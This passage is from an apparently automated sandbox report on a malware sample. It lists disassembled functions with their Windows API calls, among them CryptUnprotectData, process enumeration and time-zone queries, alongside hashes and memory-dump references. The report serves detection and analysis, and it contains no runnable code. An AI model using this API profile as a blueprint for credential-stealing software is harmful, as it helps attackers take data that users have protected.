                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: 67417D12E19BD9C5CB058B7444A02EEBFB27FD6210F6D42AAC49D5F383C774418AD3A5
                                        Function 007BC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007BC971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007BC97C
                                        • lstrcat.KERNEL32(?,007D0B47), ref: 007BCA43
                                        • lstrcat.KERNEL32(?,007D0B4B), ref: 007BCA57
                                        • lstrcat.KERNEL32(?,007D0B4E), ref: 007BCA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 58f4627cc7c869d0703bb8170424c47c062293732a2e3569345addd57bfb54a9
                                        • Instruction ID: 41c231c2a2306323c856ad36a3980e4d4e4fada61f433ed8aef2046b76bf09f6
                                        • Opcode Fuzzy Hash: 58f4627cc7c869d0703bb8170424c47c062293732a2e3569345addd57bfb54a9
                                        • Instruction Fuzzy Hash: DB4142B590821EDBDB10CF94DD89BFEB7B8BB44744F1081A9F509A7280D7749A84CF91
                                        Function 007B72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B72AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B72B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B72E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007B7304
                                        • LocalFree.KERNEL32(?), ref: 007B730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: df777f180eb617e2badc5cac7cee54ad1efb5135ad6cca7f9fd5d8dc721f0e46
                                        • Instruction ID: e1eac3138a353b7bf69edd14243a16b22f0a1029c4f86697e32eea796fe84bdb
                                        • Opcode Fuzzy Hash: df777f180eb617e2badc5cac7cee54ad1efb5135ad6cca7f9fd5d8dc721f0e46
                                        • Instruction Fuzzy Hash: C3011E75A44308BBDB14DFE4DC46FEE77B8EB44B00F204555FB05AB2C0D6B0AA419BA5
                                        Function 007C9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C97AE
                                        • Process32First.KERNEL32(007D0ACE,00000128), ref: 007C97C2
                                        • Process32Next.KERNEL32(007D0ACE,00000128), ref: 007C97D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 007C97EC
                                        • CloseHandle.KERNEL32(007D0ACE), ref: 007C980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: d4aa7e86469d7f2365b4b80ea981c8b7fd6b46ec68126011792a420f25128f49
                                        • Instruction ID: 4507386d677cbe22b9d642673b04b52e1d0880fb7417feea27e70884f38f5d83
                                        • Opcode Fuzzy Hash: d4aa7e86469d7f2365b4b80ea981c8b7fd6b46ec68126011792a420f25128f49
                                        • Instruction Fuzzy Hash: A201E975A14208EBDB60DFA4CD48BDDB7F8BB08700F10468CE609A7240EB34DA40CB50
                                        Function 007D4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: dd51ab6622372f902824f5f0cf0224be282e510cc402e75f7cf66822dae7d828
                                        • Instruction ID: db2b7a4091c26fafe2be498a061613046aa700dde717500a777ecc86ec7d6985
                                        • Opcode Fuzzy Hash: dd51ab6622372f902824f5f0cf0224be282e510cc402e75f7cf66822dae7d828
                                        • Instruction Fuzzy Hash: 0B63207241EBD41FCB27CB3087B65517F76BA1362031949CFC4C18B6B3C698AA1AE356
                                        Function 007C9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,007B51D4,40000001,00000000,00000000,?,007B51D4), ref: 007C9050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 8359a186a367214baa1010437fe7bf024315b18e1136865eb696211a89be52a4
                                        • Instruction ID: b0926eb285a33b9e54fc382fd4f9552ebc8dd6b989f39618713ea464df9842b6
                                        • Opcode Fuzzy Hash: 8359a186a367214baa1010437fe7bf024315b18e1136865eb696211a89be52a4
                                        • Instruction Fuzzy Hash: B4110A74204205FFDF40CF94D889FAA33A9AF89310F20844CFE198B250D779E981CBA4
                                        Function 007C7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007D0DE8,00000000,?), ref: 007C7B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,007D0DE8,00000000,?), ref: 007C7B54
                                        • wsprintfA.USER32 ref: 007C7B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: a1f153bfb70486d24d537aefa306ffc80a578508220f13f67e9cec901c121749
                                        • Instruction ID: 46ff52063f17aa141aa2ba1ac4af38734ce0e95c59ab91244b9be3698e6e08e4
                                        • Opcode Fuzzy Hash: a1f153bfb70486d24d537aefa306ffc80a578508220f13f67e9cec901c121749
                                        • Instruction Fuzzy Hash: 231118B2908118AACB14DBC9DD45FBEB7B8EB48B11F10411AF605A2280E6399940C7B0
                                        Function 007C7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0165EB08,00000000,?,007D0DF8,00000000,?,00000000,00000000), ref: 007C7BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0165EB08,00000000,?,007D0DF8,00000000,?,00000000,00000000,?), ref: 007C7C0D
                                        • wsprintfA.USER32 ref: 007C7C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: faf8670cfbdb5e1c9ff5c9e4253150313417783d966a0dc4b2cd82f7ba9a6998
                                        • Instruction ID: ffb2b852f8ce9c6818b1d072c0b3c180a7820817d31cafe6398a3ef1b9df9cb2
                                        • Opcode Fuzzy Hash: faf8670cfbdb5e1c9ff5c9e4253150313417783d966a0dc4b2cd82f7ba9a6998
                                        • Instruction Fuzzy Hash: 4C11A1B1909219EBEB24CB54DC45FA9B778FB44711F1043D9F619A72D0DB785A40CF50
                                        Function 00C0824B Relevance: 5.4, Strings: 3, Instructions: 1648COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?sg$f&-k$w[.^
                                        • API String ID: 0-1904539943
                                        • Opcode ID: 4ca233f7a1950f6f03f42cf89e89b2fcf05beb14a8ef85e0ac09610b75c53004
                                        • Instruction ID: 9fd89058f8a0f998b6c861f751edd632c8c49f21fc961cd504c5f246ec356417
                                        • Opcode Fuzzy Hash: 4ca233f7a1950f6f03f42cf89e89b2fcf05beb14a8ef85e0ac09610b75c53004
                                        • Instruction Fuzzy Hash: 32B25AF3A0C214AFE3046E2DEC8567BBBE9EF94720F1A463DEAC4C7744E53558018696
                                        Function 00C016C5 Relevance: 5.3, Strings: 3, Instructions: 1564COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $Y/$+{_/$rQj~
                                        • API String ID: 0-3974896256
                                        • Opcode ID: bec80b5c7ffe422598402fdebf382be2a98a345e033c59946ac41829e524699f
                                        • Instruction ID: 95507720a6493b15fd45886425f00fac0760e82979451003dd1508973a336678
                                        • Opcode Fuzzy Hash: bec80b5c7ffe422598402fdebf382be2a98a345e033c59946ac41829e524699f
                                        • Instruction Fuzzy Hash: B6A2F6F360C2049FE3046E29EC8567AFBE9EF94320F1A493DEAC4C7744EA7558058697
                                        Function 007C3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(007CE120,00000000,00000001,007CE110,00000000), ref: 007C39A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007C3A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 7aaa5b0af0d2f5759aaa6c9f5e84f3a3a0ef2a891fcfb210bc9867b04c710b42
                                        • Instruction ID: 330b0892eab50dc80bdca003d2c0dac9321a4c0ad1f19084bb122ffa808d4760
                                        • Opcode Fuzzy Hash: 7aaa5b0af0d2f5759aaa6c9f5e84f3a3a0ef2a891fcfb210bc9867b04c710b42
                                        • Instruction Fuzzy Hash: 6C41E970A40A189FDB24DB54CC95F9BB7B5BB48702F5082D8E618E72D0D771AE85CF50
                                        Function 007BA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007BA2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 007BA2F3
                                        • LocalFree.KERNEL32(?), ref: 007BA323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
